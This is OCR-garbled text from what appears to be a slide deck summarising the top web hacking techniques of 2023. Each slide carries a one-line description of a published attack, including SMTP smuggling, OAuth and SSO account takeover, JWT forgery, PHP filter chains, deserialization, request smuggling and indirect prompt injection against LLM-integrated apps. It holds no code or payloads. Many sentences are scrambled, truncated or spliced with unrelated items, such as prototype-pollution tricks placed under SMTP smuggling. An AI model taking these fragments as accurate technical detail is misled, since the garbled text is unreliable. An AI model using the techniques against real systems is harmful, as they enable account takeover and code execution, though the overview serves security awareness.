sender address of an email by exploiting the differences in how SMTP servers interpret the end-of-data sequence. This can bypass authentication mechanisms an spam filters, and enable various social engineering and phishing attacks, Some of the techniques to detect SMTP ing are: '+ Sending a large number of parameters to trigger an error message that reveals the smuggling. ‘+ Using a prefix that is ignored by the server to smuggle data without affacting the application log + Using dots in the parameter names to access nested properties and modify the prototype. + Using a different content type than JSON to avoid the JSON.parse() function and inject data, + Using spaces in the JSON payload to create a discrepancy in the response length that indica + Using the Access-Control-Expase-Headers header to leak the smuggling to the client-side. + Using the OPTIONS method to change the status code of the response by smuggling data, '+ Using a JSON payload that reflects the smuggling back to the client-si ‘+ Using the Object freeze() function to make the prototype immutable and cause an error when smuggling data, + Using an out-of-band technique to trigger a callback when smuggling data 6 the smuggling. For more dotalls and examples of theso techniques, you can read the original blog, post by SEC Consultt or the Postfix documentation? EEE HADESS.IO Top 10 web hacking techniques 2023 DOM-based race condi Blog jon: racing in the browser for fun - RyotaK's © A technique to exploit DOM-based race conditions in Angular JS applications by delaying the loading of Angular JS with @ connection pool exhaustion attack to enable DOM-based XSS via pasted clipboard data with ng- directiv EE HADESS.IO Top 10 web hacking techniques 2023 You Are Not Where You Think You Are, Opera Browsers Address Bar Spoofing Vulnerabilities © Atachnique to spoof the address bar in Opera browsers by exploiting features like intent URLs, extension updates, d fullscreen mode to display a fake URL while loading a malicious p EEE HADESS.IO Top 10 web hacking techniques 2023 CVE-2022-4908: SOP bypass in Chrome using Navigation API ne same-origin policy (SOP) in Chrom jon history array from cross-origin windows ion API's navigatlon.entries() to EE HADESS.IO Top 10 web hacking techniques 2023 SSO Gadgets: Escalate (Self-)XSS to ATO © A technique to leverage SSO gadgets in QAuth2/OIDC Implementations to convert Self-XSS to account takeover (ATO) by injecting malicious param: endpoint into the authorization re t and redirecting the victim to a controlled EEE HADESS.IO Top 10 web hacking techniques 2023 Three New Attacks Against JSON Web Tokens © Three navel JWT implementation exploiting weak keys, 2 at all \cker to forge, modify, or by ithm confusion, or signature exclusion, he validation of W1s by EE HADESS.IO Top 10 web hacking techniques 2023 Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix © Atachnique to leverage PHP filter chains to py ‘equest forgery (SSRF) to remote code execution ( 4 append arbitrary content to file data, facilitating s £) and local file inclusion (LF) attacks by manipulating the file path and content EEE HADESS.IO Top 10 web hacking techniques 2023 PHP filter chains: file read from error-based oracle © Atechnique to combine memory exhaustion and encoding translations via PHP filter chains to perfarm erro local file content leakage by triggering a warning message that reveals the file conte EEE HADESS.IO Top 10 web hacking techniques 2023 SSRF Cross Protocol Redirect Bypass ‘tocol redirection from HTTPS to HTTP by exploiting the different redirect EE HADESS.IO Top 10 web hacking techniques 2023 A New Vector For “Dirty” Arbitrary File Write to RCE oA ode execution via a tainted POF utilizing a file write vulnerability and a uWSGl nique to leverage USGI configuration parsing for remot ymorphie content and automatic reload behavior by explo! misconfiguration, ery Cea ene eens EE HADESS.IO Top 10 web hacking techniques 2023 How | Hacked Microsoft Teams and got $150,000 in Pwn20wn © A technique to achiev of context isolation, a Chromium vulnerability In Microsoft Teams through a combination of bugs includ 1S execution outside the sandbox by exploiting a logic fl EE HADESS.IO Top 10 web hacking techniques 2023 AWS WAF Clients Left Vulnerable to SQL Injection Due to Unorthodox MSSQL Design Choice © A technique to bypass AWS WAE by terminating MSSQL queries vulnerability by exploiting an unorthodox MSSQL design choice th ith ' ' Instead of *! to exploit a SQL injection ws queries to end with a space characte Pea eee eee mes eet eer EEE HADESS.IO Top 10 web hacking techniques 2023 BingBang: AAD misconfiguration led to Bing.com results manipulation and account takeover © A technique to leverage AAD multi-tenant misconfiguration far unauthorized application access leading Bing.com result manipulation and XSS attacks by exploiting a logic flaw in the Bing.com OAuth flow and a stored SS vulnerability in the Bing.com settings page. SO ene ee ere eet EEE HADESS.IO Top 10 web hacking techniques 2023 MyBB Admin Panel RCE CVE-2023-41362 © A technique to exploit catastrophic and execute arbitrary code by craftin facking in MyBiB's admin panel regex to bypass temp alicious template name that causes a denial-of-se safety cl 1 (0S) or a EE HADESS.IO Top 10 web hacking techniques 2023 Source Code at Risk: Critical Code Vulnerability in Cl/CD Platform TeamCity © A technique to bypass Teamcity interceptor pre-handling pat of execute arbitrary code. ver authentication check w ing a malicio handling for request ny TeamCity project EEE HADESS.IO Top 10 web hacking techniques 2023 Code Vulnerabilities Put Skiff Emails at Risk © Atechnique to bypass Skiff's HTML sanitization to achieve XSS and steal decrypted emails by exploiting a logic flaw in the Skiff client that allows an attacker to inject malicious HTML attributes and elements into the email body, ad er ee ene ere ert ea eee EE HADESS.IO Top 10 web hacking techniques 2023 How to break SAML if | have paws? © A technique to attack SAML Implementations through XML signature wrapping, plaintext injections, signature exclusion, flawed certificate validation, and more by exploiting various XML parsing and validation vulnerabilities ML providers and consumers, and logic Flaws in S cer EEE HADESS.IO Top 10 web hacking techniques 2023 JMX Exploitation Revisited © A technique to leverage JMX StandardMBean and RequiredModelMBean for arbitrary method invocation by exploiting a JMX co by dynamic MBean creation and nnection and a Java deserialization vulnerability eee Ces el eer Ce coerce etsy EEE HADESS.IO Top 10 web hacking techniques 2023 Java Exploitation Restrictions in Modern JDK Times © A technique to bypass Java deserialization gadget execution restrictions in modern JDKs using JShell API for JOK 5 and ~-add-opens with Reflection for JDK >= 16 by exploiting a Java deserialization vulnerability and a JDK misconfiguration Te eee eee ee eee EEE HADESS.IO Top 10 web hacking techniques 2023 Exploiting Hardened .NET Deserialization © A technique t vulnerability bypass NET des da.NET frame alization security using novel g gadget chains by exploiting a NET deserialization rk misconfiguration, EEE HADESS.IO Top 10 web hacking techniques 2023 Unserializable, but unreachable: Remote code execution on vBulletin © Atechnique to exploit class autoloading in PHP for remate cade execution by including arbitrary files using crafted Lnserialize payloads in vBulletin by exploiting a PHP unserialize vulnerability and a vBulletin misconfiguration See ea cetenrre een Cee EEE HADESS.IO Top 10 web hacking techniques 2023 Cookieless DuoDrop: IIS Auth Bypass & App Pool Privesc in ASP.NET Framework ate parent application pool identities in ASP.NET using ‘ASP.NET framework and a IS misconfiguration © A technique to Bypass 11S authent double cookleless pattern by exploiting a logic flaw int Se ee eee teeter — HADESS.IO Top 10 web hacking techniques 2023 Hunting for Nginx Alias Traversals in the wild © A technique to leverage Nginx allas misconfigurations for directory traversal attacks by explolting a path normalization vulnerability and a Nginx misconfiguration emer EE HADESS.IO Top 10 web hacking techniques 2023 DNS Analyzer - Finding DNS vulnerabilities with Burp Suite © Atechnique to use Burp Collaborator to find ONS vulnerabilities with Burp Suite by exploiting various ONS features eC ene EEE HADESS.IO Top 10 web hacking techniques 2023 Qh-Auth - Abusing OAuth to take over millions of accounts © Atechnique to manipulate OAuth token verification the OAuth provider and a lack of token validation in unt takeovers by exploiting a logic flaw in JAuth consumer fee Ree eee eters EEE HADESS.IO Top 10 web hacking techniques 2023 nOAuth: How Microsoft OAuth Misconfiguration Can Lead to Full Account Takeover soft Azure AD OAuth applications int and a lack of email verification in the © A technique to leverage mutable and unverified “email” claim withi account takeover by exploiting a misconfiguration in the Azure AD te ‘Auth consumer. EEE HADESS.IO ‘Top 10 web hacking techniques 2023 One Scheme to Rule Them All: OAuth Account Takeover © A technique to exploit OAuth with app imp exploiting a lack of scheme validation in the OAu tation via custam scheme hijacking for ac: vider akeover by a lack of state validation in the OAuth consumer. EEE HADESS.IO Top 10 web hacking techniques 2023 Exploiting HTTP Parsers Inconsistencies © A technique to exploit HTTP parser inconsistency for ACL bypass and cache poisoning by exploiting the different behaviors of HTTP servers and proxies when handling ambiguous or malformed HTTP requests, EEE HADESS.IO Top 10 web hacking techniques 2023 New ways of breaking app-integrated LLMs © A technique to perform indiract prompt injection data exfiltration, and persistent compromise by ¢ Lis and the applications stacks on application-Integrated LLMs enabling remote control ploiting the lack of input validation and output sanitization in the bsnl HADESS.IO Top 10 web hacking techniques 2023 State of DNS Rebinding in 2023 © A technique to perform DNS rebinding attacks, examining thelr effectiveness against modern web security measures by exploiting the DNS protocol an ONS cache to bypass t me-origin policy and access EE HADESS.IO Top 10 web hacking techniques 2023 Fileless Remote Code Execution on Juniper Firewalls © Atechnique to perform PHP environment variable manipulation technique that bypasses the need for a file upload, exploiting the auto_prepend file PHP feature and the Appweb web server's handling of environment variables and stdin to execute arbitrary code on Juniper firen EEE HADESS.IO Top 10 web hacking techniques 2023 Thirteen Years On: Advancing the Understanding of IIS Short File Name (SEN) Disclosure! © A technique to reveal full fle names in IlS that contain -DIGIT patterns using fle exploiting a legacy Feature o 1 and a lack of security updat enumeration techniques by 1 1S web server Fe eee Tee Pe ea tee See ee eee eee TTT EEE HADESS.IO Top 10 web hacking techniques 2023 Metamask Snaps: Playing in the Sand © Atechnique to expioit untrusted code execution via JSON sanitization bypass within Metamask Snaps environment by exploiting @ logic flaw in the Metamask extension and a lack of sandboxing in the Snaps plugin system, Paste aera EE HADESS.IO Top 10 web hacking techniques 2023 Uncovering a crazy privilege escalation from Chrome extensions © A technique to escalate to arbitrary code execution via chrome'/) URL XSS and filesystem: protocol abuse in Chrome extensions on ChromeOS by exploiting a design flaw in the Chrome extension system and a lack of security checks in the Chrome0S file manage EEE HADESS.IO Top 10 web hacking techniques 2023 Code Vulnerabilities Put Proton Mails at Risk © A technique to bypass DOMPurify sanitization in Proton Mall via sug to proton-svg renaming leading exploiting a log! of content-type validation in the Proton Mail serv XSS by i flaw in the Proton Mail client and a lac Ree eee Pea ee eee eT? EEE HADESS.IO Top 10 web hacking techniques 2023 Hacking into gRPC-Web © A technique to exploit gRPC-Web to injection by exploit Jer hidden services and parameters, leading to vulnerabilities ike SQ! the reflection feature of the gRPC-Web protocol binary forms bse HADESS.IO Top 10 web hacking techniques 2023 Yelp ATO via XSS + Cookie Bridge © A technique to achieve Account Takeover (ATO) on yelp.com and biz-yelp.com through C coupled with Cookie Bridging by exploiting a stored XSS vulnerability in the yelp.co misconfiguration in the biz.yelp.com domain, EEE HADESS.IO Top 10 web hacking techniques 2023 © A technique to leverage nginx misconfigurations to perform HTTP request splitting via control characters in variables by exploiting the different behaviors of nginx and upstream servers when handling HTTP requests with multiple headers or bodies, Fare eeeaene teste mente ete eee EE HADESS.IO Top 10 web hacking techniques 2023 XSS in GMAIL Dynamic Email © A technique to exploit CSS parsing in Gmail's AMP for Email allowed injection of m sing strict CSP » fective XSS by exploiting a design flaw in the Gmail client and a lack of sanitization in for potential phishing, hn the AMP for Email feature EE HADESS.IO Top 10 web hacking techniques 2023 Azure B2C Crypto Misuse and Account Compromise © A technique to extract public RSA keys to craft valid OAuth refresh tokens and compromise Azure AD B2C user accounts by exploiting a cryptographic misuse in ti OAuth consumer token validation in the ure AD 82C service and EE HADESS.IO Top 10 web hacking techniques 2023 Compromising F5 BIGIP with Request Smuggling © A technique to exploit the AJP protocol with HTTP request smugg bitrary system and a command inj ing to bypass authentication and execute 7 by exploiting a protocol mismatch mands on FS BIG-IP systems identified by CVE-2023-46; tion vulnerability in the FS BIG-IP system, EEE HADESS.IO Top 10 web hacking techniques 2023 EmojiDeploy: Smile! Your Azure web service just got RCE’d © A technique to exploit same-site misconfiguration and origin cl through CSRF via ZIP file deployments by exploiting a log protection in the Azure web app service, ick bypass In Azure Kudu SCM to achieve RCE in the Azure Kudu SCM service and a lack of CSRI EEE HADESS.IO Top 10 web hacking techniques 2023 One Supply Chain Attack to Rule Them All © A technique to explol internal GitHub infrastructure to compromise for supply chain attacks by exploit GitHub Action runners. fed GitHub Action runners for persistent access and executing arbitrary code on (CD secrets and potentially tamper with GitHub's runner images in the GitHub Actions system and a lack of isolation in the de EE HADESS.IO Top 10 web hacking techniques 2023 draw.io CVEs © A technique to leak OAuth tokens due to a whitespace bypass in URL validation by exploiting a logic flaw in the

You might also like